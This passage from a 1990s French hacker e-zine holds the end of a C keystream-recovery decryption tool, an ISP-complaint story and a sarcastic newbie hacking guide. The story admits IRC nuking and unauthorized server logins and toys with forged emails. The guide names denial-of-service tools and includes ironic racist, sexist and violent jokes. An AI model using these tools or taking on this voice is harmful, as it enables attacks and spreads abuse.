               Rpoint[i+1]=pos;
       }
       Rpoint[maxr]=size;

       /* insert Table data into keystream */
       for(i=0;i <= maxr;i++) {
               keystream[20+2*i]^=Rpoint[i] & 0x00ff;
               keystream[21+2*i]^=(Rpoint[i] >> 8) & 0x00ff;
       }
       cracked+=maxr*2+2;

       printf("%d bytes of keystream recovered\n",cracked);

       /* decrypt resources */
       for(i=0;i < maxr;i++) {
               rsz=Rpoint[i+1]-Rpoint[i];
               if (rsz>cracked) rsz=cracked;
               printf("Resource[%d] (%d)\n",i,rsz);
               for(j=0;j<rsz;j++) printf("%c",Data[Rpoint[i]+j]^keystream[j]);
               printf("\n");
       }


       exit(0);
}

------------------->8 CUT HERE 8<-------------------

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                 D‚boires avec Qu‚bectel et HUMOUR de newbies
                       Par Maniak (maniakz@yahoo.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
± WRITTEN BY MANIAK FOR:    T O T A L C O N T R O L   M A G A Z I N E        ±
±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
±±±±±±ÚÍÍÍÍ¿±±±±³                                           ³°°±±ÚÍÍÍÍ¿±±±±±±±
±±±±±±³1   ³°°±±³   Quebectel & haCKiNg gUiDe fOr nEwBiEs   ³°°±±³1   ³°°±±±±±
±±±±±±³ 9  ³°°±±³                                           ³°°±±³ 9  ³°°±±±±±
±±±±±±³  9 ³°°±±³          (WQ) -- MANIAK -- (WQ)           ³°°±±³  9 ³°°±±±±±
±±±±±±³   5³°°±±³ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ³°°±±³   8³°°±±±±±
±±±±±±ÀÍÍÍÍÙ°°±±³  a N t i L a M e R z   S u P e R s T a R  ³°°±±ÀÍÍÍÍÙ°°±±±±±
±±±±±±±±°°°°°°±±ÀÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÙ°°±±±±°°°°°°±±±±±
±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±

   Bonjour, ceci sont mes premiers ‚crits dans le TC magazine.  Je ne vous
   apprendrai peut-ˆtre rien au sujet du h/p/v/a/c puisque ce n'est pas le
   but de mon article qui se divise en deux parties:

   1- Mon aventure avec le service internet GLOBETROTTER de Quebectel.
   2- Un guide de hacking pour les d‚butants (lire l'introduction!!!)

ÚÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¿
      Ma d‚couverte du r‚seau internet avec l'‚quipe de GLOBETROTTER inc.                 
ÀÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÙ

   Le r‚seau internet comme vous le savez est quelque chose de formidable
   qui repr‚sente de fa‡on certaine le futur des t‚l‚communications. C'est
   un r‚seau auquel presque tout le monde peu avoir accŠs avec un ordinateur.
   €a fait environ 4 ans maintenant que j'ai un ordinateur, j'ai encore le
   mˆme aujourd'hui.  Depuis le d‚but de 1995, j'ai accŠes … internet avec
   le service internet GLOBETROTTER de Quebectel.  Avant que les longues
   distances avec la ville de Qu‚bec ne soit abolis (en d‚cembre dernier),
   Globetrotter ‚tait le seul service internet disponible dans ma r‚gion!

   DŠs le d‚but j'ai eu un petit int‚rˆt pour le cot‚ un peu 'UNDERGROUND'
   (probablement comme vous...).  Tout a toujours bien ‚t‚,  je ne fesais
   pas de conneries, j'ai toujours utilis‚ un compte entiŠrement l‚gal que
   je payais: (moiti‚ avec parents) 20$/mois.  Quebectel offre un service
   internet que je pourrais qualifier de rapide et fiable.  Le service … la
   clientŠle est assez bon (quand vous parler … une autre personne qu'une
   t‚l‚phoniste de GLOBETROTTER (ex: un technicien)). J'ai d‚j… eu de ptits
   probs de connection et on m'a toujours d‚pann‚...

   Mais, il y a environ.... (6 mois?) j'ai re‡u une premiŠre plainte pour
   m'avertir que nuker un utilisateur irc ‚tait ill‚gal.  N'importe quel
   con peut nuker direz-vous, je sais.  J'avou que j'avais vraiment nuker
   cet internaute parce qu'il me tombait sur les nerfs (Sub-Zero). Et je
   peux dire mˆme que je le comprend d'avoir envoyer une plainte … ce sujet.
   Cependant, les vrais troubles ont commenc‚s dans le mois de Mars et ‡a je
   peut difficilement l'accepter.  Durant un mercredi en plein milieu du
   mois de Mars j'ai re‡u un appel t‚l‚phonique de Quebectel me disant que
   je m'‚tait introduit ill‚galement dans les servers de L'UQUAM (universit‚
   du Qu‚bec … Montr‚al) et que j'avais vol‚ des credit cards #. HAHAHA,
   belle joke n'est-ce pas?  La premiŠre chose que je me suis demand‚ est
   comment et pourquoi j'aurais hacker une universit‚ au Qu‚bec dans le but
   d'y voler des cc#.  Aurais-je vraiment utiliser mon v‚ritable IP si 
   j'aurais eu une id‚e aussi bizarre et stupide que de hacker un server
   Qu‚b‚cois dont je ne connais mˆme pas la structure du r‚seau anyway?
   Voler des cc# sur le server telnet d'une universit‚?  Je n'ai toujours
   pas compris comment cela pourrait ˆtre possible.  De toute fa‡on, voler
   des cc# aurait d– ˆtre fortement r‚primend‚ par la GRC et j'aurais du
   d'ailleurs avoir eu leur visite puisque l'UQUAM avait mon ip et n'avait
   qu'… demander … Quebectel de transf‚rer mon cas directement … la GRC.
   On ne parle plus d'un simple nuke, on parle maintenant de FRAUDE.  Tout
   ‡a a pass‚ sans que j'en ait aucunes nouvelles.  Je n'ai mˆme pas pu
   prendre contact avec l'administrateur du server de l'UQUAM puisque
   GLOBETROTTER jugeait que ces infos ‚taient confidentielles et ils ne
   pouvaient pas plus me dire si l'UQUAM avait t‚l‚phon‚ ou bien s'ils
   avaient envoy‚s un e-mail. (J'aurais d– peut-ˆtre me renseigner ailleurs
   et appeler directement … l'UQUAM, chose que je n'ai pas fait.)

   J'ai essay‚ d'oublier cette plainte mais ‡a me trottait encore un peu
   dans la tˆte tout ‡a (normal...non?).  La vie repris un cours normal,
   sauf que deux semaines plus tard: UNE AUTRE PLAINTE.  Et celle la est
   vraiment trop dr“le...  Encore un mercredi, je re‡ois un autre tel# de
   la part de Quebectel cette fois ci m'avisant que je m'‚tait introduit
   dans le d‚partement d'‚lectronique de l'universit‚ TAMU au texas.
   (eesun1.tamu.edu : server rapide mais un peu mal administr‚..) OUI,
   je confirme que j'avais un BOT sur ce server, semi-legit, puisque
   l'utilisateur (‚tudiant) me laissait runner un bot … condition que
   je n'alle pas jouer dans ses donn‚es (gars trŠs cool) mais c'est un
   gars qui n'utilisait pas vraiment ce server de toute fa‡on et cela
   pour une raison que j'ignore totalement.  En reloadant mon bot (!#$!)
   par un bo lundi du d‚but avril, j'ai d‚cid‚ de loguer directement dans
   le shell, utilisant mon adresse IP Globetrotter (*.quebecel.com).

   Bon, la plainte re‡ue, ‚videmment je suis retourn‚ sur internet ET
   CETTE fois ci, j'ai vraiment voulu savoir de qui cette plainte venait.
   Bizarrement et surtout · MA GRANDE SURPRISE, le bot ‚tait encore up dans
   mon channel (bon un peu bizarre..).  J'ai prit un autre shell et j'ai
   essay‚ de me loguer sur eesun1.tamu.edu, WHAT THE FUCK, encore ACCÔS?
   Ils n'avaient mˆme pas changer le pass ou seulement deleter l'account
   en question, j'ai killer le bot pis jme suis dit qui fallait je parle
   avec un de ses maudits admins bizarres!  J'ai envoy‚ des emails, j'ai
   essay‚ de parler … un admin sur le shell, j'ai r‚ussi seulement une
   semaine aprŠs avoir eu la *plainte*.  Le gars avec qui j'ai parl‚ ne
   savait mˆme pas de quoi je parlait!!!!!!!!!!!  JE LUI APPRENAIS MOI
   MÒME QUE JE RUNNAIT EXACTEMENT 2 BOTS SUR SON SERVER! (Le root la!!!!)
   J'ai parl‚ avec un bon ti boutte, pis y semblait mˆme pas s'int‚resser
   … mon cas, le gars ‚tait ben smatt mais y'avait autre choses … faire.
   Il ma juste dit qu'il pouvait pas me laisser runner un bot sur un
   server qui est mˆme pas supposer en accepter et que l'‚tudiant qui me
   l'avait 'prˆter' n'aurait pas d– (le server est dans le style PRIVATE)
   Il ma dit bye, j'ai quitt‚, pis chu pu jamais retourn‚ sur ce server.

   Qui a envoy‚ ce email … QUEBECTEL?  Si c'est vraiment eux, pourquoi ils
   n'ont pas AU MOINS killer mes background process? (2 bots..)  Une autre
   histoire qui restera innexpliqu‚e!?! Entk. Continuez … lire y'en a une
   autre bonne qui arrive...

   La derniŠre plainte a vraiment ‚t‚ la derniŠre.  Mais voil… encore une
   plainte sans fondements.  J'ai parl‚ avec le directeur de Globetrotter
   qui m'a dit que cette derniŠre plainte ‚tait au sujet d'un petit 'ami'
   qui avait fait une plainte … mon sujet qui disait que je l'avait nuker
   et que je le fesait chier sur IRC.  PremiŠrement, je n'ai NULLEMENT
   nuker cet utilisateur (je ne sais pas c'est qui mais j'ai mes doutes..)
   Le directeur de Globetrotter a r‚pliquer en disant qu'il avait mon IP
   et que ‡a correspondait parfaitement avec mon LOGIN@.  Bien sure, le gars
   … eu mon IP (HAHAHA) depuis quand il faut que tu nuke quelqu'un pour qu'il
   obtienne ton adresse IP?  J'aurais peut-ˆtre d– lui parler de la commande
   /dns 'nick' ou encore mieux, une commande trŠs difficile … retenir:
   /whois 'nick'.  EN FAIT, JE PENSE QUE JE SAIS PARFAITEMENT QUI M'A FAIT
   PERDRE MON COMPTE · GLOBETROTTER:

   
 <maniak> t'as tu fini d'envoyer des fausses plaintes a Quebectel???
 <cleanup> T'aurais pas du faire ca mon homme.
 <maniak> Faire quoi???
 <maniak> T content mon criss je lai perdu mon account?!?
 <cleanup> Tu le sais ben trop qu'est ce que tu as fait mon homme...
 <maniak> c ca..

    Mes doutes s'arrˆtent donc sur cette personne pour au moins 2 des 4
    plaintes que j'ai re‡us.

    En conclusion, avant de vous choisir un ISP, parler avec quelqu'un
    qui a un account dessus depuis un bon bout de temps.  Quebectel ne
    semble vraiment pas int‚ress‚ … avoir des troubles-fˆtes sur leur
    server, mais je pense qu'il y a toujours une limite a cracher sur
    le monde.  Pourquoi aller croire tout le monde qui envoie des plaintes
    comme ci, comme ‡a?  Est-ce que faire perdre l'account PPP de kekun
    est si facile?  J'ai bien peur que les gens qui se font accuser
    de milles et une choses ne peuvent pas faire grand chose pour se
    d‚fendre.  Je serais bien curieux de savoir si tous les emails qui
    ont ‚t‚ envoy‚s sur mon dos ‚taient VRITABLES!?  (j'en doute)

    Je ne pourrai pas changer grand chose … ‡a, des tite chicanes de
    b‚b‚s sur irc qu'est ce que tu veux que les admins disent de ‡a?
    (duh!!!#$$#$!#$$#@%) Essayez juste de pas trop avoir d'ennemis sur
    irc...so next time, take care of yourself, and each other.. bye!

P.S: Quelqu'un a d‚ja v‚cu ‡a? sur Quebectel...ou ailleurs?  Si oui, emailez
moi … maniakz@yahoo.com  J'aimerais bien aussi savoir si quelqu'un sait si le
server de QUEBECTEL (GLOBETROTTER) est runn‚ sous WindowsNT ou un autre O/S.
Je voudrais aussi savoir les possibilit‚s au sujet des FAKE EMAILS :
(i.e: admin@uquam.ca .. Subject: Fraude)  et savoir quels O/S sont les plus
vuln‚rables.  Si j'apprend que QUEBECTEL est trop vuln‚rable … cela... HMmmm?

                      ---     L'INCOMPTENCE TUE      ---

ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
ÛÛÚÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¿ÛÛ
ÛÛ    Un guide pour les d‚butants au hax0ring : par antilamerz superstar    ÛÛ
ÛÛÀÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÙÛÛ
ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
                      
DISCLAIMER:  cE t3Xt … ‚T ‚cR1t dAnS lE 5eUL 3T UnIqu3 BuT D'1nf0rMer. 
ÍÍÍÍÍÍÍÍÍÍ   s1 Tu Te F41T P0Gn3R En F41sANt Qu3LQUEChoSe d'iLL3G4L, c3
             n'357 pAs DE m4 FaUt3!@#@!

             Non, sans blague, j'ai juste ‚crit ‡a pour divulger des
             infos librement! (nah...je me criss des infos, si jaurais
             vraiment trouver la libert‚ d'expression si importante,
             je me serais trouv‚ une job dans une librairie) J'ai juste
             ‚crit ‡a pour augmenter mon ‚go et avancer mon status
             social dans le magnifique monde du hacking...   .EOF.

ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍLIFE SUCKSÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ

Introduction
ÍÍÍÍÍÍÍÍÍÍÍÍ


Est-ce que la relŠve de hax0r est entrain de ruiner la r‚putation de ceux que
nous pouvons consid‚rer comme des vrais hackers?  Ce n'est pas n‚cessairement
qu'il y a trop de HACKERS, mais qu'il y a trop de WANNABE. Personnelement, je
ne me considŠre pas comme un hacker, mais quelqu'un qui s'int‚resse assez …
ce sujet par example. (Je pr‚vois ‚crire un roman sur le sujet bient“t HEHE!).
Voici un petit guide un peu 'sarcastique' qui donne un bon portrait de tous
ces petits 'wannabe l33t0 hax0rz' qui nous envahissent de plus en plus! =(

                                       ---

Comme chaque BONS Hax0r le sait, parler de facon 31337 est la partie la plus
importante du long processus pour devenir un vrai hacker.  Donc,

                        APPRENDS-LE, AIMES-LE! VIS-LE!

Prendre un nickname de leet0 hax0r est aussi trŠs important, fais le avec 
pr‚cautions ou les gens pourraient ne pas vous avoir peur de toi.

-----------------------------------------------------------------------------
------------- LE PREMIER PAS: Choisir son nickname (ou surnom..) ------------
-----------------------------------------------------------------------------

Tout les grands hax0rs on un nickname 31337. jm'en va t'aider … choisir le
meilleur pseudonyme possible....

PREMIÔRE TAPE:

Prend un nickname qu'au moins 70 autres personnes ont; comme madman, coolman,
acid, superman et demon.

DEUXIÔME TAPE: 

Si tu peux pas en trouver un que des dizaines de personnes ont, assure toi
d'en prendre un qui a des 's ou des 'z dedans, le monde vont trouver ‡a dure
… tapper au clavier et ‡a pourrait mˆme les d‚ranger!!!  Alors, en r‚sum‚,
ne prends pas quelque chose qui a du sens.  · la place de prendre de quoi  
comme genre: MAD, essaye plut“t XMaDx ou xXMaDXx ou encore mieux, _xMadx_ .

TROISIÔME TAPE:

Fait le ‚poeurant, va pas prendre de quoi qui te d‚cris... ou quelque chose
de trop simple! Mais prends un nickname plus dans le style de: H3LLGOD,
H4CKER'z, ^AOLBITCH_ ou DEATHKILL.  Tu peux pas savoir … quel point le monde 
vont te trouver tellement cool! =) (SI TU ES DJ· CONNECTER) 

QUATRIÔME TAPE:

Embarque dans un groupe warez ou si tu veux ˆtre vraiment 31337, start en un!
Je suggŠre le nom V.H.E qui veut dire: Voluntary Human extinction. Le monde
t'‚coeureront pas parce qui vont savoir que t un r‚volutionnaire, un gars qui
va vraiment changer de quoi dans notre soci‚t‚.  De toute fa‡on, peu importe
quel sorte de groupe que tu veux starter, fait de la pub en masse et un *.nfo
pour montrer ton ‚quipe... avec une petite note dans le bas: *Looking for
Quality hackers as we are* L… les tits newbies ou les s‚niors vont arriver l…
pis y vont vraiment commencer … faire circuler ton nom en tant que MAD Hax0R.
                        (SI TU ES DJ· CONNECTER)

CINQUIÔME TAPE:

AprŠs que tu aies eu un criss de cool de calisse de bo nickname va dans toute
les newsgroup de 2600, posent foule de questions sur la fa‡on de hacker des
maudits gros server (parce que toi t'en ai rendu l…...) comme ‡a y vont savoir
que tu sais de quoi tu parles.  (SI TU ES DJ· CONNECTER)

SIXIÔME TAPE:

Truc! : Maintenant que tu as tout ce respect tu pourrais te lancer dans le 
phreak et dire au petit *phreakeux* que tu peux leur en apprendre.

Nickname choisit? le nom de ton groupe de hacking aussi?  Bienvenu fiston!

-----------------------------------------------------------------------------
----------------------------- SECTION 1 : SE CONNECTER ----------------------
-----------------------------------------------------------------------------

Pour te connecter … partir de la maison, tu dois d'abord poss‚der un ordi...
Tu peux en trouver aux ventes de garage, ou encore si tu pr‚fŠres, dans les
magasins sp‚cialis‚s.  Assure toi de dire au vendeur que tu l'achŠtes dans le
seul et unique but de Hax0rEr.  AprŠs que tu aie acqu‚ri un ordinateur, check
si tu as un modem dedans.   Y'a comme des petites sorties pour le t‚l‚phone
sur un modem, c'est souvent une petite boite avec une lumiŠre dessus aussi.
MAIS, ATTENTION !  NE JAMAIS UTILISER UN MODEM POUR FAIRE DES APPELS AUTRES
QUE POUR SE CONNECTER SUR LE NET! La plupart du temps ces t‚l‚phones sont mis
sur ‚coute par la police, essaye de pogner un modem _externe_ les polices ne
pourront donc pas ‚couter sur une extension.  Bon, aprŠs avoir appris que t'a
un modem, t'est pas loin de devenir un hacker!  La prochaine chose que tu as
… faire c'est de te pogner un account sur America online imm‚diatement, c'est
le terrain de jeu des hackers, tu vas y rencontrer plein de monde intelligent.
Pour faire ‡a par example, il faut r‚fl‚chir un peu.  Y faut d'abord que tu te
pognes quelques softwares d'AOL.  Pour faire ainsi, tu peux te rendre … ton
bureau de poste local et r‚clamer un bo cd d'AOL.  AOL est financ‚ par les
gouvernements et habituellement gratuits dans les 50 permiŠres heures!  Si t'
est trop gŠn‚ pour aller voir la *femme mail* attend un peu, dans 2-3 mois tu
devrais avoir un disk d'AOL, si c'est pas d‚j… le cas.  AprŠs avoir surloader
ton Hard drive avec leur bullshit de softwares, tu es fin prˆt … te cr‚er un
tit account. Bon ‚videmment, prends un login comme *AOLKILLER* ... de quoi de
trŠs *killer* comme je l'expliquais plus haut...  Account cr‚e? Pas encore?
Facture de 350$ d'interrurbains parce que tu te connectait sur AOL Au Japon?
Peu importe, ceux qui passent cette ‚tape doivent sauter … la SECTION 2.

P.S: Hey Les amis, si vous avez un modem, mais pas accŠs … internet, ni les
magnifiques softwares AOL, vous pouvez aller les pogner sur leur BBS GRATUIT !!!

                         ÚÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¿
    SOFTWARES, INFOS!    ³ AOLZ BBS: 1-800-827-5808 ³    HELP, FREE STUFF!
                         ÀÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÙ
-----------------------------------------------------------------------------
-------------------------- SECTION 2: AVOIR L'AIR COOL ----------------------
-----------------------------------------------------------------------------

La chose la plus importante quand tu hack est d'avoir l'air cool. Si t'a l'air
cool, les gens t'aiment et tu peux donc les hax0rer comme tu veux.  Si ils ne
pensent pas que t'a l'air cool, c'est des lamers de toute fa‡on!  Avoir l'air
cool s'accomplie en ayant une attitude de "bad-ass" et en ayant des qualit‚s
uniques et personelles, comme ˆtre un raveux ou un drogu‚...  TrŠs bizzarement
la plupart des gens vont penser que t'ai cool si tu leur dit que t'ai une
femelle!  Y vont aussi penser que tu es cool si tu t'arranges pour qu'il te
ph33r.  Mais l'art de se faire ph33rer viendra plus tard dans les chapitres
suivants, ‚tant une m‚thode de hacking plus avanc‚e.  Pr‚sentement, fait juste
suivre ces quelques rŠgles … propos de l'art d'avoir l'air cool:  Ne parle
jamais d'ordinateur et utilise toujous des lettres majuscules et des chiffres
lorsque tu ‚crit (sur irc par exemple).  Oh...et pour te dire... pour passer
pour un leet0 hax0r tu d015 t3 f41r3 arreter par le FBI/GRC plusieurs fois.
Bon, mettons les choses au claire, c'est quelque chose qui est DURE … prouver,
voyons quelques techniques pour te faire arrˆter par la police:

I.  Joue des tours au FBI, c'est trop hot, surtout quand il te retrace pas.

II. Hack directement leur serveur avec un ordinateur que t'a pris sur le
    march‚ noir, si tu penses que les techniciens du server sont trop nuls,
    assure toi de laisser ton nom et ton adresse … quelque part sur le server
    (laisser le num‚ro de t‚l‚phone serait pratique) Tu ne penses pas pouvoir
    les hacker? tu feel pas au hacking today? Pas de prob, suit attentivement
    les autres m‚thodes qui s'offrent … toi:

III. Appele la police.
     
   Appele la police et dit leur que tu connais un gros vendeux de drug de la
   mafia dans le style super dangeureux, qui reste dans l'appart … cot‚ de 
   chez vous!  Mais donne leur TON adresse!  Tu laisses ta porte grande ouve-
   rte avec une note des choses que tu pr‚vois faire dans ta soir‚e (note que 
   tu laisses … la port‚e de tous(sur la table...)).
 
1. Faire la vaiselle
2. Ramasser ma chambre
3. Faire l'‚picerie
4. Hacker satellite3.pathfinder.06.nasa.gov
5. Garder l'enfant de la voisine
6. Torturer l'enfant de la voisine
7. Tuer l'enfant de la voisine
8. Camoufler la d‚pouille de l'enfant de la voisine dans un buisson.
etc..
etc..

Aussi, assure toi d'avoir plein d'infos au sujet des drogues, ment, comme ‡a
tu peux ˆtre sure qui vont t'arrˆter.  Si y refuse encore de t'arrˆter, met
toi … crier: HACK THE PLANET!!! AOL SUCKS!!! FREE BINEZ !! ... €a d‚range pas
si t'a l'air d'un pauvre con, tous les hackers n'ont aucuns sens. (*)

				      * Point de vue sarcastique de l'auteur.

Maintenant que t'a fini ton ptit show de l33tness aprŠs avoir ‚t‚ arrˆt‚ et
relach‚ (faute de preuves!), va te vanter et parler de pourquoi et comment tu
t'ai mis la CIA le FBI et la GRC … dos. Si y'a un petit looser qui ne te crois
pas, hax0r lui le cul sans aucune piti‚.

D'autres fa‡ons d'avoir l'air cool inclusent le scrolling, le mass mailing,
et n'oublions pas le pouvoir extrˆme du Ph33rage.

Mentionnons aussi que tous les hackers doivent ˆtre racistes, sexistes et
des bƒtards apocalyptiques, alors supporte ton kkk local.  N'oublie pas de 
traiter la femme comme un pussy et souviens toi que tu peux acheter l'amour.
La derniŠre fa‡on d'avoir l'air cool (et ceux-l… sont les seules fa‡ons) est
d'affirmer que t un des bons friends de Kevin Mitnik ou un membre d'un des
plus gros groupes de hacking au monde. (2600, HIP, WQ...) Cela va augmenter
grandement la peur que les gens auront envers toi, mais si ils demandent
n'importe quelle questions … ce sujet, soit que tu les ignores ou soit que tu
es EXTRÒMEMENT vague dans tes r‚ponses sinon ils ne te prendront pas au s‚rieux
parce que les vrais LEET0 hax0rz n'ont jamais de fait, il disent juste des 
choses comme: "Moi et kevin on est les meilleurs amis au monde, on hax0r
binez ensemble"  C'est ‡a qui va impresionner tout le monde et qui va te 
donner une r‚putation de L33t instantan‚ment et le plus important, tu vas
avoir l'air COOL!

-----------------------------------------------------------------------------
------------------------- SECTION 3: L'ART DE FAIRE PEUR --------------------
-----------------------------------------------------------------------------

S'arranger pour que les gens te ph33r ne vient pas facilement. C'est un art.
Pour qu'il ait peur de toi, en premier lieu, tu doit demander des questions
comme: "R there any good hax0rs here?!? Gimme a good  dial-up for Unix if u 
dare".  En second lieu, tu dois parler comme un "warez-pup" qui dit des choses
comme: "jo0r m0mma!" bon ‚videmment c'est une autres des techniques...tout 
comme hax0rer les chat rooms de AOL.  Traite les gens de lame aussi.  Tu vois?
Trop facile! et le monde te ph33r maintenant.  Mais ne pense jamais que tu 
0wn binez; "ph33r binez cuz he owns YOU".

-----------------------------------------------------------------------------
-------------------------- SECTION 4: L'ART DE "FUCKER" ---------------------
-----------------------------------------------------------------------------

Avant, de fucker le monde, tu dois savoir ce que tu essais d'accomplir.  Si tu
as l'intention de voler, modifier ou briser, continue ta lecture. En effet,
tu peux facilement take over l'ordi de quelqu'un en obtenant son adresse ip.  
Soit en connaissant l'adresse de leur site warez ftp (ou simplement en leur 
demandant (HEHE))  Tu peux les faire chier avec un program super rare et cool
(ping.exe) en les pingant sans arrˆt!  S'ils ont un FTP, tu peux le killer en
utilisant un trŠs leet PORT FUCKER, set le a "Fuck" port 21!  Tu es un hacker
plus avanc‚? Utilise winnuke, cet outil trŠs puissant va les rebooter BADLY 
et toute les fucker, toutefois je n'ose pas m'avancer davantage sur cet outil 
trŠs puissant que les gens n‚gligent … mon avis...

-----------------------------------------------------------------------------
--------------------------- SECTION 5: ADVANCED SKILLZ ----------------------
-----------------------------------------------------------------------------

AprŠs avoir chemin‚ … travers des m‚thodes de base du |-|4><0|2ing, regardons
de plus prŠs les techniques avan‡‚es:

La premiŠre chose que t'a … faire (QUAND TU SAIS QUE TU ES UN HACKER DJ· 
TRÔS POPULAIRE) est d'aller dans les channels "\\'4r3z" et d'y passer un bon
minimum de 4238923487 heures par semaine jusqu'… ce que tu store au moins 8-9 
Gigs de warez (mˆme si t'en as pas de besoin).  Maintenant va dans un channel
de jeune "phreaks" (i.e: #!!!!!!warez&your_mom) et offre des trades WAREZ '4'
WAREZ. C'est trŠs l33t de prendre en consid‚ration que les gens vont t'ignorer
si tu ne le dis qu'une seule fois, alors un VRAI hax0rz le scrollerait au moins
de 10 … 12 fois, et comme je l'ai enseign‚ dans les chapitres pr‚c‚dent, tous
ces textes doivent ˆtre ‚crits avec des LEE70 WaREZ FoNtz.  Si aprŠs 3 sec.
y'a pas personne qui a r‚pondu, scroll le encore (seulement 9 ou 10 fois).  
N'est pas peur d'utiliser une ponctuation ‚xag‚r‚e (i.e: ANYONE WANNA TRADE 
PAPERBOY FOR THE LAST VERSION OF WOLFENSTEIN 3D???!!!!???). Asteur, plusieurs
fois ‡a pourrait bien arriver qu'un petit lamer qui est la essaye de gƒcher, 
de ruinner ta leetn355 g‚n‚rale en disant de la bullshit dans le style : 
"This isn't a warez room".  coute les pas, utilise une des techniques que je
t'ai appris et montre leur c'est qui le CRISS de 1337 icite...  Si ces lamers
semblent vraiment invincibles, t'a juste … rire de leur mŠres et les traiter 
de pauvres GAYS.

-----------------------------------------------------------------------------
----------------------------- SECTION 6: PHREAKING --------------------------
-----------------------------------------------------------------------------

Cette setion porte sur un sujet chaud! Le phreaking.  Le mot en tant que telle
(Phreaking) peut se r‚sumer en un terme assez simple: pHonE Hax0rIng.  Pour
ˆtre un super phreaker, tu as besoin des l‚gendaires boŒtes color‚es.  Pour
pouvoir construire ces boŒtes, tu as besoin du mat‚riel suivant:

Red Box:   -Une boŒte, de la peinture rouge en spray.
Blue Box:  -Une boŒte, de la peinture bleu en spray.
Black Box: -Une boŒte, de la peinture noire en spray.

  Vu le fait que ses boŒtes sont si difficiles … construire, nous allons
  changer de sujet, prenez un break.  Allez vous reposer les yeux ou vous
  chercher … manger, puisque dans la prochaine SECTION nous changeons de
  sujet de fa‡on draftique (...?) Nous allons parler de la fa‡on d'avoir
  du succŠs auprŠs de la gente f‚minine en tant que LEET HAX0R. On aurait
  bien sure pu parler d'autre sujets comme les BBS ou simplement argumenter
  davantage sur le hacking, mais les femmes passent avant ‡a!

-----------------------------------------------------------------------------
---------- SECTION 7: LES CYBER-POUPES ET COMMENT CE LES FAIRES. -----------
-----------------------------------------------------------------------------

Dans l'une des sections plus haut, j'‚crivait, et je cite:

                 'N'oublie pas de traiter la femme comme un pussy
                  et souviens toi que tu peux acheter l'amour.'

Un vrai 'Mad HaX0r From hell' voudrait encore plus de conseils … ce sujet, eh
bien je vais approfondir sur ce sujet avec d'autres techniques et mˆme des
exemples pour savoir comment ˆtre appr‚ci‚ des filles sur LE NET.

Une vraie cyber-poup‚e est une fille qui hack.  Une cyber-poup‚e est souvent
la r‚compense de tout bon hacker.  Bien sure, les filles peuvent *pas* ˆtre
de *vraies hackeuses* mais c le fun qu'il y en ait quelques unes qui semblent
le pr‚tendre, ‡a ajoute de la diversit‚ dans la communaut‚ du hacking. Une
bonne fa‡on de d‚couvrir s'il y a des hackeuses hot dans des channels IRC est
de le demander! (i.e: 'R THERE ANY FEMALES IN DA ROOM?!!?@#$\@').  Donc, si tu
as d‚couvert qu'il y en a plusieurs dans ton channel, c'est probablement une
bonne id‚e d'aller les gagner … l'aide de ton charme de 1337.  Tu fais ‡a en
